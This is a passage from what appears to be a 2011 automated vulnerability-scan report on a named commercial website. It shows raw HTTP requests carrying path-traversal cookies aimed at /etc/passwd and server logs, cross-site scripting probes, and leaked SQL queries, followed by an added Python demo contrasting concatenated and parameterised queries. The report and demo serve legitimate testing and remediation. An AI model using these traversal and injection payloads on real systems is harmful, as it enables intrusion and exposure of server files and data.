OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2u1fa85e55q6ak8kkh5i01mlg1; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00055D)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/

/ppc/leadflow/ CONFIRMED

http://www.insideup.com/ppc/leadflow/?'"--></style></script><script>alert(0x000559)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000559)</script>

Request

GET /ppc/leadflow/?'"--></style></script><script>netsparker(0x000559)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mg0qggj87ulapruv307rvtm8u7; path=/
Content-Length: 2893
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>' OR prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>' OR prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>' OR prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>' OR 
prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>' OR prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000559)</script>/' union select prj.catI' at line 5
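The three /ppc/leadflow findings above are reported as cross-site scripting, but the response bodies show something more: the raw request path is concatenated into a MySQL query spanning the lead_flow_*_pages_details tables, and the site prints both the query text and the MySQL syntax error into a text/html body. That is error-based SQL injection (the CWE-89 class this report also counts) with the XSS riding on the verbatim echo. The block below is an added example, not code from the scan report or from the insideup.com application: it rebuilds that lookup locally two ways, once by string concatenation as the echoed query shows, once with bound parameters, and checks the output side with html.escape. The table and column names are copied from the leaked query; the schema, sample rows, SQLite in place of MySQL, and every function name are assumptions made for this demo.

```python
"""Added example, not from the scan report or the target site: the leaked
lookup query rebuilt against a constructed SQLite schema, unsafe and safe."""
import html
import sqlite3

# Two of the five table names leaked by the echoed query (enough for the demo).
PAGE_TABLES = ["lead_flow_one_pages_details", "lead_flow_two_pages_details"]

# Netsparker's canary exactly as it appears in the confirmed finding; the
# leading single quote is what terminates the SQL string literal.
CANARY = "'\"--></style></script><script>netsparker(0x00055D)</script>"

SELECT_COLUMNS = (
    "select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url "
    "from {table} prj "
    "left join sub_category cats on cats.sub_category_id = prj.catId "
    "left join lead_flow_template temps on temps.template_id = prj.templateId "
    "left join lead_flow_group grps on grps.group_id = prj.groupId "
)


def make_db():
    """Constructed in-memory schema mirroring the joined tables (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table sub_category(sub_category_id integer primary key);
        create table lead_flow_template(template_id integer primary key);
        create table lead_flow_group(group_id integer primary key, group_name text);
        create table lead_flow_one_pages_details(
            catId integer, groupId integer, templateId integer, project_page_url text);
        create table lead_flow_two_pages_details(
            catId integer, groupId integer, templateId integer, project_page_url text);
        insert into sub_category values (20001);
        insert into lead_flow_template values (1);
        insert into lead_flow_group values (2, 'wede');
        insert into lead_flow_one_pages_details values (20001, 2, 1, 'leadflow/wede00/project.php');
        insert into lead_flow_two_pages_details values (20001, 2, 1, 'leadflow/wede00/other.php');
    """)
    return conn


def lookup_unsafe(conn, page_url):
    """Concatenation, as the echoed query shows the site doing. Returns
    ('rows', [...]) or ('error', text); on error the text is query + message,
    which is exactly what the report's responses print into the page."""
    sql = " union ".join(
        SELECT_COLUMNS.format(table=t)
        + f"where prj.project_page_url = '{page_url}' "
          f"OR prj.project_page_url = '{page_url}/'"
        for t in PAGE_TABLES)
    try:
        return "rows", conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "error", f"{sql}{exc}"  # verbatim echo, mirroring the responses


def lookup_safe(conn, page_url):
    """Same query with bound parameters: the path is data, never SQL."""
    sql = " union ".join(
        SELECT_COLUMNS.format(table=t)
        + "where prj.project_page_url = ? OR prj.project_page_url = ?"
        for t in PAGE_TABLES)
    params = []
    for _ in PAGE_TABLES:
        params += [page_url, page_url + "/"]
    return "rows", conn.execute(sql, params).fetchall()


def reflects_script(body):
    """Triage check used by the scanner logic: is the canary's <script> tag
    present unencoded in the HTML body?"""
    return "<script>netsparker(" in body


def demo():
    """Runs the legit path, the report's canary and a tautology (the last one
    goes beyond the page's evidence to show data exposure, not just an error)."""
    conn = make_db()
    legit = "leadflow/wede00/project.php"
    probe = legit + CANARY
    status, detail = lookup_unsafe(conn, probe)
    return {
        "legit_rows": len(lookup_safe(conn, legit)[1]),
        "unsafe_probe_status": status,                       # 'error', as on the page
        "unsafe_reflects_script": reflects_script(str(detail)),
        "escaped_reflects_script": reflects_script(html.escape(str(detail))),
        "safe_probe_rows": len(lookup_safe(conn, probe)[1]),  # treated as a plain string
        "unsafe_tautology_rows": len(lookup_unsafe(conn, "x' OR '1'='1")[1]),
        "safe_tautology_rows": len(lookup_safe(conn, "x' OR '1'='1")[1]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two fixes follow from the demo, and both are needed: bind the path as a parameter so a quote in it can neither break the statement nor alter its logic, and stop sending the query text and database error to the client at all (log them server-side, return a generic message); html.escape on the error text removes the script reflection but would still leak table names and schema to anyone who triggers the error.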
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST '"--></style></script><script>alert(0x00055B)</script>
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 327
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00055B)%3c%2fscript%3e&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:46 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F99D90FD69BB4B3C4B6566AE86F091CF; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
